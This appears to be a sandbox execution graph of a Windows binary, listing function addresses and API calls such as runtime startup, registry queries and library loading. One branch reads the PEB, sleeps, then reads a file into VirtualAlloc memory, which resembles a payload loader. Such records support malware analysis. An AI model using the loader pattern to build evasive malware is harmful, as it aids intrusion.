                                                  execution_graph 95030 5b03fb 95031 5b0407 __FrameHandler3::FrameUnwindToState 95030->95031 95059 5afeb1 95031->95059 95033 5b040e 95034 5b0561 95033->95034 95037 5b0438 95033->95037 95086 5b083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 95034->95086 95036 5b0568 95087 5b4e52 28 API calls _abort 95036->95087 95048 5b0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 95037->95048 95070 5c247d 95037->95070 95039 5b056e 95088 5b4e04 28 API calls _abort 95039->95088 95043 5b0576 95044 5b0457 95046 5b04d8 95078 5b0959 95046->95078 95048->95046 95082 5b4e1a 38 API calls 3 library calls 95048->95082 95050 5b04de 95051 5b04f3 95050->95051 95083 5b0992 GetModuleHandleW 95051->95083 95053 5b04fa 95053->95036 95054 5b04fe 95053->95054 95055 5b0507 95054->95055 95084 5b4df5 28 API calls _abort 95054->95084 95085 5b0040 13 API calls 2 library calls 95055->95085 95058 5b050f 95058->95044 95060 5afeba 95059->95060 95089 5b0698 IsProcessorFeaturePresent 95060->95089 95062 5afec6 95090 5b2c94 10 API calls 3 library calls 95062->95090 95064 5afecb 95065 5afecf 95064->95065 95091 5c2317 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 95064->95091 95065->95033 95067 5afed8 95068 5afee6 95067->95068 95092 5b2cbd 8 API calls 3 library calls 95067->95092 95068->95033 95073 5c2494 95070->95073 95072 5b0451 95072->95044 95074 5c2421 95072->95074 95093 5b0a8c 95073->95093 95075 5c2450 95074->95075 95076 5b0a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 95075->95076 95077 5c2479 95076->95077 95077->95048 95101 5b2340 95078->95101 95081 5b097f 95081->95050 95082->95046 95083->95053 95084->95055 95085->95058 95086->95036 95087->95039 95088->95043 95089->95062 95090->95064 95091->95067 95092->95065 95094 5b0a97 IsProcessorFeaturePresent 95093->95094 95095 5b0a95 95093->95095 95097 5b0c5d 95094->95097 95095->95072 95100 5b0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 95097->95100 95099 5b0d40 95099->95072 95100->95099 95102 5b096c GetStartupInfoW 95101->95102 95102->95081 95103 591098 95108 5942de 95103->95108 95107 5910a7 95129 59a961 95108->95129 95112 594342 95122 594378 95112->95122 95146 5993b2 95112->95146 95114 59436c 95150 5937a0 95114->95150 95115 59441b GetCurrentProcess IsWow64Process 95117 594437 95115->95117 95118 59444f LoadLibraryA 95117->95118 95119 5d3824 GetSystemInfo 95117->95119 95120 59449c GetSystemInfo 95118->95120 95121 594460 GetProcAddress 95118->95121 95125 594476 95120->95125 95121->95120 95124 594470 GetNativeSystemInfo 95121->95124 95122->95115 95123 5d37df 95122->95123 95124->95125 95126 59447a FreeLibrary 95125->95126 95127 59109d 95125->95127 95126->95127 95128 5b00a3 29 API calls __onexit 95127->95128 95128->95107 95154 5afe0b 95129->95154 95131 59a976 95164 5afddb 95131->95164 95133 5942f5 GetVersionExW 95134 596b57 95133->95134 95135 5d4ba1 95134->95135 95136 596b67 _wcslen 95134->95136 95137 5993b2 22 API calls 95135->95137 95139 596b7d 95136->95139 95140 596ba2 95136->95140 95138 5d4baa 95137->95138 95138->95138 95189 596f34 22 API calls 95139->95189 95142 5afddb 22 API calls 95140->95142 95144 596bae 95142->95144 95143 596b85 __fread_nolock 95143->95112 95145 5afe0b 22 API calls 95144->95145 95145->95143 95147 5993c9 __fread_nolock 95146->95147 95148 5993c0 95146->95148 95147->95114 95148->95147 95190 59aec9 95148->95190 95151 5937ae 95150->95151 95152 5993b2 22 API calls 95151->95152 95153 5937c2 95152->95153 95153->95122 95156 5afddb 95154->95156 95157 5afdfa 95156->95157 95160 5afdfc 95156->95160 95174 5bea0c 95156->95174 95181 5b4ead 7 API calls 2 library calls 95156->95181 95157->95131 95159 5b066d 95183 5b32a4 RaiseException 95159->95183 95160->95159 95182 5b32a4 RaiseException 95160->95182 95163 5b068a 95163->95131 95167 5afde0 95164->95167 95165 5bea0c ___std_exception_copy 21 API calls 95165->95167 95166 5afdfa 95166->95133 95167->95165 95167->95166 95170 5afdfc 95167->95170 95186 5b4ead 7 API calls 2 library calls 95167->95186 95169 5b066d 95188 5b32a4 RaiseException 95169->95188 95170->95169 95187 5b32a4 RaiseException 95170->95187 95173 5b068a 95173->95133 95179 5c3820 __dosmaperr 95174->95179 95175 5c385e 95185 5bf2d9 20 API calls __dosmaperr 95175->95185 95176 5c3849 RtlAllocateHeap 95178 5c385c 95176->95178 95176->95179 95178->95156 95179->95175 95179->95176 95184 5b4ead 7 API calls 2 library calls 95179->95184 95181->95156 95182->95159 95183->95163 95184->95179 95185->95178 95186->95167 95187->95169 95188->95173 95189->95143 95191 59aedc 95190->95191 95195 59aed9 __fread_nolock 95190->95195 95192 5afddb 22 API calls 95191->95192 95193 59aee7 95192->95193 95194 5afe0b 22 API calls 95193->95194 95194->95195 95195->95147 95196 59105b 95201 59344d 95196->95201 95198 59106a 95232 5b00a3 29 API calls __onexit 95198->95232 95200 591074 95202 59345d __wsopen_s 95201->95202 95203 59a961 22 API calls 95202->95203 95204 593513 95203->95204 95233 593a5a 95204->95233 95206 59351c 95240 593357 95206->95240 95213 59a961 22 API calls 95214 59354d 95213->95214 95261 59a6c3 95214->95261 95217 5d3176 RegQueryValueExW 95218 5d320c RegCloseKey 95217->95218 95219 5d3193 95217->95219 95222 593578 95218->95222 95231 5d321e _wcslen 95218->95231 95220 5afe0b 22 API calls 95219->95220 95221 5d31ac 95220->95221 95267 595722 95221->95267 95222->95198 95225 594c6d 22 API calls 95225->95231 95226 5d31d4 95227 596b57 22 API calls 95226->95227 95228 5d31ee ISource 95227->95228 95228->95218 95230 59515f 22 API calls 95230->95231 95231->95222 95231->95225 95231->95230 95270 599cb3 95231->95270 95232->95200 95276 5d1f50 95233->95276 95236 599cb3 22 API calls 95237 593a8d 95236->95237 95278 593aa2 95237->95278 95239 593a97 95239->95206 95241 5d1f50 __wsopen_s 95240->95241 95242 593364 GetFullPathNameW 95241->95242 95243 593386 95242->95243 95244 596b57 22 API calls 95243->95244 95245 5933a4 95244->95245 95246 5933c6 95245->95246 95247 5933dd 95246->95247 95248 5d30bb 95246->95248 95288 5933ee 95247->95288 95250 5afddb 22 API calls 95248->95250 95252 5d30c5 _wcslen 95250->95252 95251 5933e8 95255 59515f 95251->95255 95253 5afe0b 22 API calls 95252->95253 95254 5d30fe __fread_nolock 95253->95254 95256 59516e 95255->95256 95260 59518f __fread_nolock 95255->95260 95258 5afe0b 22 API calls 95256->95258 95257 5afddb 22 API calls 95259 593544 95257->95259 95258->95260 95259->95213 95260->95257 95262 59a6dd 95261->95262 95266 593556 RegOpenKeyExW 95261->95266 95263 5afddb 22 API calls 95262->95263 95264 59a6e7 95263->95264 95265 5afe0b 22 API calls 95264->95265 95265->95266 95266->95217 95266->95222 95268 5afddb 22 API calls 95267->95268 95269 595734 RegQueryValueExW 95268->95269 95269->95226 95269->95228 95271 599cc2 _wcslen 95270->95271 95272 5afe0b 22 API calls 95271->95272 95273 599cea __fread_nolock 95272->95273 95274 5afddb 22 API calls 95273->95274 95275 599d00 95274->95275 95275->95231 95277 593a67 GetModuleFileNameW 95276->95277 95277->95236 95279 5d1f50 __wsopen_s 95278->95279 95280 593aaf GetFullPathNameW 95279->95280 95281 593ae9 95280->95281 95282 593ace 95280->95282 95284 59a6c3 22 API calls 95281->95284 95283 596b57 22 API calls 95282->95283 95285 593ada 95283->95285 95284->95285 95286 5937a0 22 API calls 95285->95286 95287 593ae6 95286->95287 95287->95239 95289 5933fe _wcslen 95288->95289 95290 5d311d 95289->95290 95291 593411 95289->95291 95292 5afddb 22 API calls 95290->95292 95298 59a587 95291->95298 95294 5d3127 95292->95294 95296 5afe0b 22 API calls 95294->95296 95295 59341e __fread_nolock 95295->95251 95297 5d3157 __fread_nolock 95296->95297 95300 59a59d 95298->95300 95302 59a598 __fread_nolock 95298->95302 95299 5df80f 95300->95299 95301 5afe0b 22 API calls 95300->95301 95301->95302 95302->95295 95303 165bda0 95317 16599f0 95303->95317 95305 165be56 95320 165bc90 95305->95320 95307 165be7f CreateFileW 95309 165bece 95307->95309 95310 165bed3 95307->95310 95310->95309 95311 165beea VirtualAlloc 95310->95311 95311->95309 95312 165bf08 ReadFile 95311->95312 95312->95309 95313 165bf23 95312->95313 95314 165ac90 13 API calls 95313->95314 95315 165bf56 95314->95315 95316 165bf79 ExitProcess 95315->95316 95316->95309 95319 165a07b 95317->95319 95323 165ce80 GetPEB 95317->95323 95319->95305 95321 165bc99 Sleep 95320->95321 95322 165bca7 95321->95322 95323->95319 95324 59f7bf 95325 59f7d3 95324->95325 95326 59fcb6 95324->95326 95328 59fcc2 95325->95328 95329 5afddb 22 API calls 95325->95329 95432 59aceb 23 API calls ISource 95326->95432 95433 59aceb 23 API calls ISource 95328->95433 95331 59f7e5 95329->95331 95331->95328 95332 59f83e 95331->95332 95333 59fd3d 95331->95333 95350 59ed9d ISource 95332->95350 95373 5a1310 95332->95373 95434 601155 22 API calls 95333->95434 95336 5afddb 22 API calls 95357 59ec76 ISource 95336->95357 95337 59fef7 95345 59a8c7 22 API calls 95337->95345 95337->95350 95340 5e4600 95340->95350 95435 59a8c7 95340->95435 95341 5e4b0b 95440 60359c 82 API calls __wsopen_s 95341->95440 95342 59a8c7 22 API calls 95342->95357 95345->95350 95348 59fbe3 95348->95350 95351 5e4bdc 95348->95351 95358 59f3ae ISource 95348->95358 95349 59a961 22 API calls 95349->95357 95441 60359c 82 API calls __wsopen_s 95351->95441 95353 5b0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95353->95357 95354 5e4beb 95442 60359c 82 API calls __wsopen_s 95354->95442 95355 5b01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95355->95357 95356 5b00a3 29 API calls pre_c_initialization 95356->95357 95357->95336 95357->95337 95357->95340 95357->95341 95357->95342 95357->95348 95357->95349 95357->95350 95357->95353 95357->95354 95357->95355 95357->95356 95357->95358 95359 5a06a0 95357->95359 95431 5a01e0 235 API calls 2 library calls 95357->95431 95358->95350 95439 60359c 82 API calls __wsopen_s 95358->95439 95362 5a0863 ISource 95359->95362 95365 5a06bd 95359->95365 95360 5a0d36 95364 5a0847 ISource 95360->95364 95446 5aacd5 39 API calls 95360->95446 95362->95360 95363 5a082a ISource 95362->95363 95362->95364 95368 5e5ffd 95362->95368 95363->95364 95363->95368 95444 5ace17 22 API calls ISource 95363->95444 95364->95357 95365->95360 95365->95362 95365->95363 95365->95364 95370 5a081e 95365->95370 95367 5e600f 95367->95357 95368->95367 95445 5bcf65 39 API calls 95368->95445 95370->95363 95372 5e5e15 95370->95372 95443 5bcf65 39 API calls 95372->95443 95374 5a17b0 95373->95374 95375 5a1376 95373->95375 95590 5b0242 5 API calls __Init_thread_wait 95374->95590 95377 5a1390 95375->95377 95378 5e6331 95375->95378 95447 5a1940 95377->95447 95595 61709c 235 API calls 95378->95595 95380 5a17ba 95383 5a17fb 95380->95383 95385 599cb3 22 API calls 95380->95385 95382 5e633d 95382->95357 95389 5e6346 95383->95389 95390 5a182c 95383->95390 95395 5a17d4 95385->95395 95386 5a1940 9 API calls 95387 5a13b6 95386->95387 95387->95383 95388 5a13ec 95387->95388 95388->95389 95412 5a1408 __fread_nolock 95388->95412 95596 60359c 82 API calls __wsopen_s 95389->95596 95592 59aceb 23 API calls ISource 95390->95592 95393 5a1839 95593 5ad217 235 API calls 95393->95593 95394 5e6369 95394->95357 95591 5b01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95395->95591 95398 5e636e 95597 60359c 82 API calls __wsopen_s 95398->95597 95400 5a153c 95403 5a1940 9 API calls 95400->95403 95401 5e63d1 95599 615745 54 API calls _wcslen 95401->95599 95405 5a1549 95403->95405 95404 5afddb 22 API calls 95404->95412 95408 5a1940 9 API calls 95405->95408 95416 5e64fa 95405->95416 95406 5a1872 95594 5afaeb 23 API calls 95406->95594 95407 5afe0b 22 API calls 95407->95412 95410 5a1563 95408->95410 95410->95416 95418 59a8c7 22 API calls 95410->95418 95420 5a15c7 ISource 95410->95420 95412->95393 95412->95394 95412->95398 95412->95404 95412->95407 95414 5a152f 95412->95414 95415 5e63b2 95412->95415 95457 59ec40 95412->95457 95414->95400 95414->95401 95598 60359c 82 API calls __wsopen_s 95415->95598 95416->95394 95600 60359c 82 API calls __wsopen_s 95416->95600 95418->95420 95419 5a1940 9 API calls 95419->95420 95420->95394 95420->95406 95420->95416 95420->95419 95422 5a167b ISource 95420->95422 95481 5fd4ce 95420->95481 95484 606ef1 95420->95484 95564 594f39 95420->95564 95570 60f0ec 95420->95570 95579 601e96 95420->95579 95583 61958b 95420->95583 95586 61959f 95420->95586 95421 5a171d 95421->95357 95422->95421 95589 5ace17 22 API calls ISource 95422->95589 95431->95357 95432->95328 95433->95333 95434->95350 95436 59a8ea __fread_nolock 95435->95436 95437 59a8db 95435->95437 95436->95350 95437->95436 95438 5afe0b 22 API calls 95437->95438 95438->95436 95439->95350 95440->95350 95441->95354 95442->95350 95443->95372 95444->95363 95445->95367 95446->95364 95448 5a1981 95447->95448 95452 5a195d 95447->95452 95601 5b0242 5 API calls __Init_thread_wait 95448->95601 95451 5a198b 95451->95452 95602 5b01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95451->95602 95456 5a13a0 95452->95456 95603 5b0242 5 API calls __Init_thread_wait 95452->95603 95453 5a8727 95453->95456 95604 5b01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95453->95604 95456->95386 95460 59ec76 ISource 95457->95460 95458 5b00a3 29 API calls pre_c_initialization 95458->95460 95459 5e4beb 95609 60359c 82 API calls __wsopen_s 95459->95609 95460->95458 95460->95459 95461 59fef7 95460->95461 95462 5a06a0 41 API calls 95460->95462 95463 5afddb 22 API calls 95460->95463 95465 5e4600 95460->95465 95466 5e4b0b 95460->95466 95467 59a8c7 22 API calls 95460->95467 95473 59ed9d ISource 95460->95473 95474 5b0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95460->95474 95475 59fbe3 95460->95475 95476 59a961 22 API calls 95460->95476 95479 5b01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95460->95479 95480 59f3ae ISource 95460->95480 95605 5a01e0 235 API calls 2 library calls 95460->95605 95470 59a8c7 22 API calls 95461->95470 95461->95473 95462->95460 95463->95460 95471 59a8c7 22 API calls 95465->95471 95465->95473 95607 60359c 82 API calls __wsopen_s 95466->95607 95467->95460 95470->95473 95471->95473 95473->95412 95474->95460 95475->95473 95477 5e4bdc 95475->95477 95475->95480 95476->95460 95608 60359c 82 API calls __wsopen_s 95477->95608 95479->95460 95480->95473 95606 60359c 82 API calls __wsopen_s 95480->95606 95610 5fdbbe lstrlenW 95481->95610 95485 59a961 22 API calls 95484->95485 95486 606f1d 95485->95486 95487 59a961 22 API calls 95486->95487 95488 606f26 95487->95488 95489 606f3a 95488->95489 95823 59b567 39 API calls 95488->95823 95615 597510 95489->95615 95492 606fbc 95495 597510 53 API calls 95492->95495 95493 6070bf 95638 594ecb 95493->95638 95498 606fc8 95495->95498 95497 606f57 _wcslen 95497->95492 95497->95493 95504 6070e9 95497->95504 95502 59a8c7 22 API calls 95498->95502 95506 606fdb 95498->95506 95499 6070e5 95501 59a961 22 API calls 95499->95501 95499->95504 95500 594ecb 94 API calls 95500->95499 95503 60711a 95501->95503 95502->95506 95507 59a961 22 API calls 95503->95507 95504->95420 95505 607027 95510 597510 53 API calls 95505->95510 95506->95505 95509 607005 95506->95509 95512 59a8c7 22 API calls 95506->95512 95508 607126 95507->95508 95511 59a961 22 API calls 95508->95511 95513 5933c6 22 API calls 95509->95513 95514 607034 95510->95514 95515 60712f 95511->95515 95512->95509 95516 60700f 95513->95516 95517 607047 95514->95517 95518 60703d 95514->95518 95521 59a961 22 API calls 95515->95521 95522 597510 53 API calls 95516->95522 95824 5fe199 GetFileAttributesW 95517->95824 95519 59a8c7 22 API calls 95518->95519 95519->95517 95524 607138 95521->95524 95525 60701b 95522->95525 95523 607050 95526 607063 95523->95526 95529 594c6d 22 API calls 95523->95529 95527 597510 53 API calls 95524->95527 95528 596350 22 API calls 95525->95528 95531 597510 53 API calls 95526->95531 95537 607069 95526->95537 95530 607145 95527->95530 95528->95505 95529->95526 95660 59525f 95530->95660 95533 6070a0 95531->95533 95825 5fd076 57 API calls 95533->95825 95534 607166 95702 594c6d 95534->95702 95537->95504 95539 6071a9 95540 59a8c7 22 API calls 95539->95540 95542 6071ba 95540->95542 95541 594c6d 22 API calls 95543 607186 95541->95543 95705 596350 95542->95705 95543->95539 95546 596b57 22 API calls 95543->95546 95547 60719b 95546->95547 95549 596b57 22 API calls 95547->95549 95548 596350 22 API calls 95550 6071d6 95548->95550 95549->95539 95551 596350 22 API calls 95550->95551 95552 6071e4 95551->95552 95553 597510 53 API calls 95552->95553 95554 6071f0 95553->95554 95714 5fd7bc 95554->95714 95556 607201 95557 5fd4ce 4 API calls 95556->95557 95558 60720b 95557->95558 95559 597510 53 API calls 95558->95559 95563 607239 95558->95563 95560 607229 95559->95560 95768 602947 95560->95768 95562 594f39 68 API calls 95562->95504 95563->95562 95565 594f43 95564->95565 95567 594f4a 95564->95567 95566 5be678 67 API calls 95565->95566 95566->95567 95568 594f59 95567->95568 95569 594f6a FreeLibrary 95567->95569 95568->95420 95569->95568 95571 597510 53 API calls 95570->95571 95572 60f126 95571->95572 96310 599e90 95572->96310 95574 60f136 95575 59ec40 235 API calls 95574->95575 95576 60f15b 95574->95576 95575->95576 95578 60f15f 95576->95578 96338 599c6e 22 API calls 95576->96338 95578->95420 95580 601ea4 95579->95580 95581 601e9f 95579->95581 95580->95420 96359 600f67 95581->96359 96380 617f59 95583->96380 95585 61959b 95585->95420 95587 617f59 120 API calls 95586->95587 95588 6195af 95587->95588 95588->95420 95589->95422 95590->95380 95591->95383 95592->95393 95593->95406 95594->95406 95595->95382 95596->95394 95597->95394 95598->95394 95599->95410 95600->95394 95601->95451 95602->95452 95603->95453 95604->95456 95605->95460 95606->95473 95607->95473 95608->95459 95609->95473 95611 5fdbdc GetFileAttributesW 95610->95611 95612 5fd4d5 95610->95612 95611->95612 95613 5fdbe8 FindFirstFileW 95611->95613 95612->95420 95613->95612 95614 5fdbf9 FindClose 95613->95614 95614->95612 95616 597525 95615->95616 95632 597522 95615->95632 95617 59755b 95616->95617 95618 59752d 95616->95618 95621 59756d 95617->95621 95627 5d500f 95617->95627 95628 5d50f6 95617->95628 95826 5b51c6 26 API calls 95618->95826 95827 5afb21 51 API calls 95621->95827 95622 5d510e 95622->95622 95625 5afddb 22 API calls 95629 597547 95625->95629 95626 59753d 95626->95625 95631 5afe0b 22 API calls 95627->95631 95633 5d5088 95627->95633 95829 5b5183 26 API calls 95628->95829 95630 599cb3 22 API calls 95629->95630 95630->95632 95634 5d5058 95631->95634 95632->95497 95828 5afb21 51 API calls 95633->95828 95635 5afddb 22 API calls 95634->95635 95636 5d507f 95635->95636 95637 599cb3 22 API calls 95636->95637 95637->95633 95830 594e90 LoadLibraryA 95638->95830 95643 5d3ccf 95646 594f39 68 API calls 95643->95646 95644 594ef6 LoadLibraryExW 95838 594e59 LoadLibraryA 95644->95838 95648 5d3cd6 95646->95648 95649 594e59 3 API calls 95648->95649 95651 5d3cde 95649->95651 95860 5950f5 95651->95860 95652 594f20 95652->95651 95653 594f2c 95652->95653 95655 594f39 68 API calls 95653->95655 95657 594f31 95655->95657 95657->95499 95657->95500 95659 5d3d05 95661 59a961 22 API calls 95660->95661 95662 595275 95661->95662 95663 59a961 22 API calls 95662->95663 95664 59527d 95663->95664 95665 59a961 22 API calls 95664->95665 95666 595285 95665->95666 95667 59a961 22 API calls 95666->95667 95668 59528d 95667->95668 95669 5d3df5 95668->95669 95670 5952c1 95668->95670 95671 59a8c7 22 API calls 95669->95671 95672 596d25 22 API calls 95670->95672 95673 5d3dfe 95671->95673 95674 5952cf 95672->95674 95675 59a6c3 22 API calls 95673->95675 95676 5993b2 22 API calls 95674->95676 95678 595304 95675->95678 95677 5952d9 95676->95677 95677->95678 95679 596d25 22 API calls 95677->95679 95680 595349 95678->95680 95681 595325 95678->95681 95697 5d3e20 95678->95697 95683 5952fa 95679->95683 95981 596d25 95680->95981 95681->95680 95687 594c6d 22 API calls 95681->95687 95685 5993b2 22 API calls 95683->95685 95684 59535a 95686 595370 95684->95686 95691 59a8c7 22 API calls 95684->95691 95685->95678 95688 595384 95686->95688 95693 59a8c7 22 API calls 95686->95693 95689 595332 95687->95689 95692 59538f 95688->95692 95695 59a8c7 22 API calls 95688->95695 95689->95680 95694 596d25 22 API calls 95689->95694 95690 596b57 22 API calls 95699 5d3ee0 95690->95699 95691->95686 95696 59a8c7 22 API calls 95692->95696 95700 59539a 95692->95700 95693->95688 95694->95680 95695->95692 95696->95700 95697->95690 95698 594c6d 22 API calls 95698->95699 95699->95680 95699->95698 95994 5949bd 22 API calls __fread_nolock 95699->95994 95700->95534 95703 59aec9 22 API calls 95702->95703 95704 594c78 95703->95704 95704->95539 95704->95541 95706 596362 95705->95706 95707 5d4a51 95705->95707 95996 596373 95706->95996 96006 594a88 22 API calls __fread_nolock 95707->96006 95710 59636e 95710->95548 95711 5d4a5b 95712 5d4a67 95711->95712 95713 59a8c7 22 API calls 95711->95713 95713->95712 95715 5fd7d8 95714->95715 95716 5fd7dd 95715->95716 95717 5fd7f3 95715->95717 95718 5fd7ee 95716->95718 95720 59a8c7 22 API calls 95716->95720 95719 59a961 22 API calls 95717->95719 95718->95556 95721 5fd7fb 95719->95721 95720->95718 95722 59a961 22 API calls 95721->95722 95723 5fd803 95722->95723 95724 59a961 22 API calls 95723->95724 95725 5fd80e 95724->95725 95726 59a961 22 API calls 95725->95726 95727 5fd816 95726->95727 95728 59a961 22 API calls 95727->95728 95729 5fd81e 95728->95729 95730 59a961 22 API calls 95729->95730 95731 5fd826 95730->95731 95732 59a961 22 API calls 95731->95732 95733 5fd82e 95732->95733 95734 59a961 22 API calls 95733->95734 95735 5fd836 95734->95735 95736 59525f 22 API calls 95735->95736 95737 5fd84d 95736->95737 95738 59525f 22 API calls 95737->95738 95739 5fd866 95738->95739 95740 594c6d 22 API calls 95739->95740 95741 5fd872 95740->95741 95742 5fd885 95741->95742 95743 5993b2 22 API calls 95741->95743 95744 594c6d 22 API calls 95742->95744 95743->95742 95745 5fd88e 95744->95745 95746 5fd89e 95745->95746 95747 5993b2 22 API calls 95745->95747 95748 5fd8b0 95746->95748 95749 59a8c7 22 API calls 95746->95749 95747->95746 95750 596350 22 API calls 95748->95750 95749->95748 95751 5fd8bb 95750->95751 96007 5fd978 22 API calls 95751->96007 95753 5fd8ca 96008 5fd978 22 API calls 95753->96008 95755 5fd8dd 95756 594c6d 22 API calls 95755->95756 95757 5fd8e7 95756->95757 95758 5fd8fe 95757->95758 95759 5fd8ec 95757->95759 95761 594c6d 22 API calls 95758->95761 95760 5933c6 22 API calls 95759->95760 95762 5fd8f9 95760->95762 95763 5fd907 95761->95763 95767 596350 22 API calls 95762->95767 95764 5fd925 95763->95764 95766 5933c6 22 API calls 95763->95766 95765 596350 22 API calls 95764->95765 95765->95718 95766->95762 95767->95764 95769 602954 __wsopen_s 95768->95769 95770 5afe0b 22 API calls 95769->95770 95771 602971 95770->95771 95772 595722 22 API calls 95771->95772 95773 60297b 95772->95773 96009 60274e 95773->96009 95775 602986 95776 59511f 64 API calls 95775->95776 95777 60299b 95776->95777 95778 602a6c 95777->95778 95779 6029bf 95777->95779 96041 602e66 75 API calls 95778->96041 96038 602e66 75 API calls 95779->96038 95782 6029c4 95787 602a75 ISource 95782->95787 96039 5bd583 26 API calls 95782->96039 95784 5950f5 40 API calls 95785 602a91 95784->95785 95786 5950f5 40 API calls 95785->95786 95789 602aa1 95786->95789 95787->95563 95788 6029ed 96040 5bd583 26 API calls 95788->96040 95790 5950f5 40 API calls 95789->95790 95792 602abc 95790->95792 95793 5950f5 40 API calls 95792->95793 95794 602acc 95793->95794 95795 5950f5 40 API calls 95794->95795 95797 602ae7 95795->95797 95796 602a38 95796->95784 95796->95787 95798 5950f5 40 API calls 95797->95798 95799 602af7 95798->95799 95800 5950f5 40 API calls 95799->95800 95801 602b07 95800->95801 95802 5950f5 40 API calls 95801->95802 95803 602b17 95802->95803 96012 603017 GetTempPathW GetTempFileNameW 95803->96012 95805 602b22 95806 5be5eb 29 API calls 95805->95806 95817 602b33 95806->95817 95808 602bf8 95810 602c12 95808->95810 95811 602bfe DeleteFileW 95808->95811 95809 5950f5 40 API calls 95809->95817 95812 602c91 CopyFileW 95810->95812 95813 602c18 95810->95813 95811->95787 95814 602ca7 DeleteFileW 95812->95814 95815 602cb9 DeleteFileW 95812->95815 96042 6022ce 79 API calls 95813->96042 95814->95787 96035 602fd8 CreateFileW 95815->96035 95817->95787 95817->95809 95819 602bed 95817->95819 96013 5bdbb3 95817->96013 96022 5be678 95819->96022 95821 602c7c 95821->95815 95822 602c80 DeleteFileW 95821->95822 95822->95787 95823->95489 95824->95523 95825->95537 95826->95626 95827->95626 95828->95628 95829->95622 95831 594ea8 GetProcAddress 95830->95831 95832 594ec6 95830->95832 95833 594eb8 95831->95833 95835 5be5eb 95832->95835 95833->95832 95834 594ebf FreeLibrary 95833->95834 95834->95832 95866 5be52a 95835->95866 95837 594eea 95837->95643 95837->95644 95839 594e8d 95838->95839 95840 594e6e GetProcAddress 95838->95840 95843 594f80 95839->95843 95841 594e7e 95840->95841 95841->95839 95842 594e86 FreeLibrary 95841->95842 95842->95839 95844 5afe0b 22 API calls 95843->95844 95845 594f95 95844->95845 95846 595722 22 API calls 95845->95846 95847 594fa1 __fread_nolock 95846->95847 95848 5d3d1d 95847->95848 95849 5950a5 95847->95849 95859 594fdc 95847->95859 95938 60304d 74 API calls 95848->95938 95927 5942a2 CreateStreamOnHGlobal 95849->95927 95852 5d3d22 95854 59511f 64 API calls 95852->95854 95853 5950f5 40 API calls 95853->95859 95855 5d3d45 95854->95855 95856 5950f5 40 API calls 95855->95856 95858 59506e ISource 95856->95858 95858->95652 95859->95852 95859->95853 95859->95858 95933 59511f 95859->95933 95861 5d3d70 95860->95861 95862 595107 95860->95862 95960 5be8c4 95862->95960 95865 6028fe 27 API calls 95865->95659 95867 5be536 __FrameHandler3::FrameUnwindToState 95866->95867 95868 5be544 95867->95868 95871 5be574 95867->95871 95891 5bf2d9 20 API calls __dosmaperr 95868->95891 95870 5be549 95892 5c27ec 26 API calls pre_c_initialization 95870->95892 95873 5be579 95871->95873 95874 5be586 95871->95874 95893 5bf2d9 20 API calls __dosmaperr 95873->95893 95883 5c8061 95874->95883 95877 5be58f 95878 5be5a2 95877->95878 95879 5be595 95877->95879 95895 5be5d4 LeaveCriticalSection __fread_nolock 95878->95895 95894 5bf2d9 20 API calls __dosmaperr 95879->95894 95881 5be554 __fread_nolock 95881->95837 95884 5c806d __FrameHandler3::FrameUnwindToState 95883->95884 95896 5c2f5e EnterCriticalSection 95884->95896 95886 5c807b 95897 5c80fb 95886->95897 95890 5c80ac __fread_nolock 95890->95877 95891->95870 95892->95881 95893->95881 95894->95881 95895->95881 95896->95886 95905 5c811e 95897->95905 95898 5c8088 95911 5c80b7 95898->95911 95899 5c8177 95916 5c4c7d 20 API calls 2 library calls 95899->95916 95902 5c8180 95917 5c29c8 95902->95917 95904 5c8189 95904->95898 95923 5c3405 11 API calls 2 library calls 95904->95923 95905->95898 95905->95899 95905->95905 95914 5b918d EnterCriticalSection 95905->95914 95915 5b91a1 LeaveCriticalSection 95905->95915 95907 5c81a8 95924 5b918d EnterCriticalSection 95907->95924 95910 5c81bb 95910->95898 95926 5c2fa6 LeaveCriticalSection 95911->95926 95913 5c80be 95913->95890 95914->95905 95915->95905 95916->95902 95918 5c29fc _free 95917->95918 95919 5c29d3 RtlFreeHeap 95917->95919 95918->95904 95919->95918 95920 5c29e8 95919->95920 95925 5bf2d9 20 API calls __dosmaperr 95920->95925 95922 5c29ee GetLastError 95922->95918 95923->95907 95924->95910 95925->95922 95926->95913 95928 5942bc FindResourceExW 95927->95928 95932 5942d9 95927->95932 95929 5d35ba LoadResource 95928->95929 95928->95932 95930 5d35cf SizeofResource 95929->95930 95929->95932 95931 5d35e3 LockResource 95930->95931 95930->95932 95931->95932 95932->95859 95934 59512e 95933->95934 95935 5d3d90 95933->95935 95939 5bece3 95934->95939 95938->95852 95942 5beaaa 95939->95942 95941 59513c 95941->95859 95946 5beab6 __FrameHandler3::FrameUnwindToState 95942->95946 95943 5beac2 95955 5bf2d9 20 API calls __dosmaperr 95943->95955 95945 5beae8 95957 5b918d EnterCriticalSection 95945->95957 95946->95943 95946->95945 95948 5beac7 95956 5c27ec 26 API calls pre_c_initialization 95948->95956 95949 5beaf4 95958 5bec0a 62 API calls 2 library calls 95949->95958 95952 5beb08 95959 5beb27 LeaveCriticalSection __fread_nolock 95952->95959 95954 5bead2 __fread_nolock 95954->95941 95955->95948 95956->95954 95957->95949 95958->95952 95959->95954 95963 5be8e1 95960->95963 95962 595118 95962->95865 95964 5be8ed __FrameHandler3::FrameUnwindToState 95963->95964 95965 5be92d 95964->95965 95966 5be900 ___scrt_fastfail 95964->95966 95967 5be925 __fread_nolock 95964->95967 95978 5b918d EnterCriticalSection 95965->95978 95976 5bf2d9 20 API calls __dosmaperr 95966->95976 